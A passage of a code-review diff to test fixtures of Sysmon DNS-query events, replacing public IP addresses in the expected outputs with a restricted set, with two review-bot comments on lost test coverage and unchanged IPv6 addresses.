Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.611619700Z'/\u003e\u003cEventRecordID\u003e101\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.005\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eups.analytics.yahoo.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 prod.ups-yahoo.aolp-ds-prd.aws.oath.cloud;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.611Z", 
@@ -4555,39 +4484,39 @@ "type": "CNAME" }, { - "data": "34.237.248.89", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.153.21.25", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.200.238.112", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.206.93.38", + "data": "89.160.20.156", "type": "A" }, { - "data": "34.227.35.137", + "data": "89.160.20.156", "type": "A" }, { - "data": "35.169.96.208", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.22.206.42", + "data": "89.160.20.156", "type": "A" }, { - "data": "52.201.81.61", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4595,22 +4524,22 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" } ], "resolved_ip": [ - "34.237.248.89", - "35.153.21.25", - "52.200.238.112", - "52.206.93.38", - "34.227.35.137", - "35.169.96.208", - "52.22.206.42", - "52.201.81.61", - "192.5.6.30", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "network": { 
@@ -4626,23 +4555,16 @@ "pm.w55c.net" ], "ip": [ - "34.237.248.89", - "35.153.21.25", - "52.200.238.112", - "52.206.93.38", - "34.227.35.137", - "35.169.96.208", - "52.22.206.42", - "52.201.81.61", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30" + "192.168.14.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741343Z", + "ingested": "2021-12-09T13:50:23.456810600Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:34.237.248.89;::ffff:35.153.21.25;::ffff:52.200.238.112;::ffff:52.206.93.38;::ffff:34.227.35.137;::ffff:35.169.96.208;::ffff:52.22.206.42;::ffff:52.201.81.61;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802369600Z'/\u003e\u003cEventRecordID\u003e102\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.070\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003epm.w55c.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
dxedge-prod-lb-946522505.us-east-1.elb.amazonaws.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -4702,11 +4624,11 @@ }, "answers": [ { - "data": "35.186.239.238", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4714,7 +4636,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -4722,7 +4644,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -4730,7 +4652,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -4738,7 +4660,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -4746,23 +4668,23 @@ "type": "AAAA" }, { - "data": "192.35.51.30", + "data": "192.168.51.30", "type": "A" } ], "resolved_ip": [ - "35.186.239.238", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "network": { 
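Review bot: The `related.ip` array for pm.w55c.net shrinks from eleven entries to four in this hunk (the header's 23→16 line count is that collapse), because the eight distinct A answers now all read `89.160.20.156` and `related.ip` appears to be de-duplicated while `dns.resolved_ip` is not. The fixture therefore no longer demonstrates that every A record of a multi-answer response reaches `related.ip`; a regression that appended only the first answer would still match this expected output. If the supported subset documents more than one IPv4 address, giving at least two of the eight answers different values (keeping `"data": "89.160.20.156"` for one and a second supported address for another) would preserve that coverage; otherwise the intentional loss is worth a sentence in the PR. The enclosing event object starts and ends outside this hunk.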
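Review bot: The IPv4 gTLD-server answers are rewritten to RFC 1918 addresses (`192.5.6.30` → `192.168.6.30`, `192.33.14.30` → `192.168.14.30`, …) but the AAAA answers interleaved with them — `2001:503:a83e::2:30`, `2001:503:231d::2:30`, `2001:503:83eb::30`, `2001:500:856e::30`, `2001:502:1ca1::30` — stay as real, routable public addresses in `answers`, `resolved_ip`, `related.ip` and the `event.original` QueryResults string. That is inconsistent with the stated purpose of the change (test public IPs limited to the supported subset) and presumably leaves any IPv6 geo/ASN enrichment on these records unasserted rather than covered by the test database the subset exists for. Either map them onto the documentation prefix `2001:db8::/32` (RFC 3849) or an IPv6 address the supported set provides, or state in the changelog that IPv6 addresses were deliberately left out of scope. The object this hunk edits begins and ends outside the hunk.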
@@ -4777,24 +4699,24 @@ "cm.eyereturn.com" ], "ip": [ - "35.186.239.238", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30", - "192.35.51.30" + "192.168.51.30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741351600Z", + "ingested": "2021-12-09T13:50:23.456816800Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData 
Name='QueryResults'\u003e::ffff:35.186.239.238;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;192.35.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802391800Z'/\u003e\u003cEventRecordID\u003e103\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.093\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.eyereturn.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;192.168.51.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -4858,12 +4780,12 @@ "type": "CNAME" }, { - "data": "172.217.10.66", + "data": "89.160.20.156", "type": "A" } ], "resolved_ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "network": { 
@@ -4879,13 +4801,13 @@ "www.googletagservices.com" ], "ip": [ - "172.217.10.66" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741395500Z", + "ingested": "2021-12-09T13:50:23.456822500Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:172.217.10.66;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' 
Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802402000Z'/\u003e\u003cEventRecordID\u003e104\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.099\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ewww.googletagservices.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 pagead46.l.doubleclick.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -4949,11 +4871,11 @@ "type": "CNAME" }, { - "data": "173.231.178.117", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -4961,7 +4883,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -4969,7 +4891,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -4977,7 +4899,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { 
@@ -4985,7 +4907,7 @@ "type": "AAAA" }, { - "data": "192.12.94.30", + "data": "192.168.94.30", "type": "A" }, { @@ -4994,16 +4916,16 @@ } ], "resolved_ip": [ - "173.231.178.117", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, 
@@ -5020,23 +4942,23 @@ "cm.adgrx.com" ], "ip": [ - "173.231.178.117", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30", - "192.12.94.30", + "192.168.94.30", "2001:502:1ca1::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741401200Z", + "ingested": "2021-12-09T13:50:23.456828200Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 
rtb.adgrx.com;::ffff:173.231.178.117;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802413000Z'/\u003e\u003cEventRecordID\u003e105\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecm.adgrx.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 rtb.adgrx.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet 
Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:34:03.802Z", @@ -5104,11 +5026,11 @@ "type": "CNAME" }, { - "data": "104.193.83.156", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -5116,7 +5038,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -5124,7 +5046,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -5132,7 +5054,7 @@ "type": "AAAA" }, { - "data": "192.31.80.30", + "data": "192.168.80.30", "type": "A" }, { @@ -5141,14 +5063,14 @@ } ], "resolved_ip": [ - "104.193.83.156", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, 
@@ -5166,21 +5088,21 @@ "csm2waycm-atl.netmng.com" ], "ip": [ - "104.193.83.156", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30", - "192.31.80.30", + "192.168.80.30", "2001:500:856e::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741407500Z", + "ingested": "2021-12-09T13:50:23.456834100Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 j2waycm.netmng.com;type: 5 j2waycm-us-wdc.netmng.com;::ffff:104.193.83.156;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;\u003c/Data\u003e\u003cData 
Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:03.802423900Z'/\u003e\u003cEventRecordID\u003e106\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:03.107\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ecsm2waycm-atl.netmng.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 